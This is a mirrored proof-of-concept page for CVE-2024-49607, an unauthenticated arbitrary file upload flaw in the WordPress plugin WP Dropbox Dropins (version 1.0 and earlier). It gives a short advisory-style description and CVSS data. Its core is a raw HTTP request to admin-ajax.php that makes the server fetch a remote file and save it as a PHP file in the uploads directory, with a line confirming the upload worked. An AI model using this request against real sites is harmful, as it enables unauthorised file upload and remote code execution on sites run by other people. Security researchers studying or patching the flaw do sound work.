Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-49607 PoC — WordPress plugin WP Dropbox Dropins 代码问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin WP Dropbox Dropins 代码问题漏洞 (CVE-2024-49607)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Dropbox Dropins 1.0版本及之前版本存在代码问题漏洞,该漏洞源于不受限制地上传具有危险类型漏洞的文件。
Description
WP Dropbox Dropins <= 1.0 - Unauthenticated Arbitrary File Upload
Readme
# CVE-2024-49607
WP Dropbox Dropins &lt;= 1.0 - Unauthenticated Arbitrary File Upload


# Description:
The WP Dropbox Dropins plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.


```
Published: 2024-10-17 00:00:00
CVE: CVE-2024-49607
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wp-dropbox-dropins
```

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://kubernetes.docker.internal
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

action=chooser_upload&data[filename]=dropbox-uploads/test.php&data[url]=https://rfi.nessus.org/rfi.txt
```

It uploaded it to http://kubernetes.docker.internal/wp-content/uploads/2024/11/dropbox-uploads/test.php
File Snapshot

[4.0K] /data/pocs/b2cfda0c2b17fba5c52fb9d8cb6b58359c7ea4e2 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.